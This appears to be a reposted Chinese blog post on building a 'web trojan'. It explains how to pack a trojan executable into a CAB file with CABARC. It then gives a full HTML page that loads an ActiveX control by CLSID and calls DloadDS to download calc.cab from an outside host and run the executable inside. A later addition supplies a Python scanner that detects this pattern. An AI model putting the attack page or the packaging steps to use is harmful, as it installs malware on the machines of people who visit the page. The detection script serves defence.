Baidu web trojan tool

Source: 7jdg's blog

Building the Baidu web trojan requires CABARC, the CAB file packaging tool.

Usage: CABARC [options] command cabfile [@list] [files] [dest_dir]

Commands:
L List contents of cabinet (e.g. cabarc l test.cab)
N Create new cabinet (e.g. cabarc n test.cab *.c app.mak *.h)
X Extract file(s) from cabinet (e.g. cabarc x test.cab foo*.c)

For example: cabarc n calc.cab muma.exe

This compresses muma.exe into the file calc.cab.

Below is the web trojan page. calc.exe is the trojan file inside the CAB file; read cocoruder's write-up closely and it will make sense.

<html>
<head>
<script>
function DowndloadCalcAndRun()
{
com.DloadDS("http://ruder.cdut.net/attach/calc.cab", "calc.exe", 0);
}
</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
</html>
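
A detection-side sketch for the pattern shown above, added here and not part of the original post: it flags HTML that instantiates the control with the CLSID from the OBJECT tag and reports the CAB URL and file name passed to DloadDS. The class and function names and both sample pages are constructed for illustration, and only literal, unobfuscated calls are matched.

```python
import re
from html.parser import HTMLParser

# CLSID copied from the OBJECT tag in the page above.
TARGET_CLSID = "A7F05EE4-0426-454F-8013-C41E3596E9E9"

class ObjectScanner(HTMLParser):
    """Collects ids of OBJECT tags loading the target control, and all script bodies."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # tag and attribute names arrive lowercased
        if tag == "object" and TARGET_CLSID in a.get("classid", "").upper():
            self.object_ids.append(a.get("id", ""))
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan(html):
    """Return (object_id, cab_url, file_name) for each DloadDS call on a matching object."""
    p = ObjectScanner()
    p.feed(html)
    p.close()
    hits = []
    # Scripts are matched after the whole page is parsed: the call may precede the OBJECT tag.
    for oid in filter(None, p.object_ids):
        call = re.compile(r"\b" + re.escape(oid) + r"\s*\.\s*DloadDS\s*\(\s*"
                          r"([\"'])(.*?)\1\s*,\s*([\"'])(.*?)\3", re.I)
        for script in p.scripts:
            hits += [(oid, m.group(2), m.group(4)) for m in call.finditer(script)]
    return hits

# Constructed sample pages (not real captures).
SAMPLE = """<html><head><script>
function run() { ctl.DloadDS("http://example.test/a.cab", "a.exe", 0); }
</script></head>
<OBJECT ID = "ctl" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}"></OBJECT>
<script>run()</script></html>"""
BENIGN = ('<object id="x" classid="clsid:{00000000-0000-0000-0000-000000000000}">'
          '</object><script>x.DloadDS("u", "f", 0)</script>')

if __name__ == "__main__":
    print(scan(SAMPLE), scan(BENIGN))
```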

Download: cab文件封装器.rar
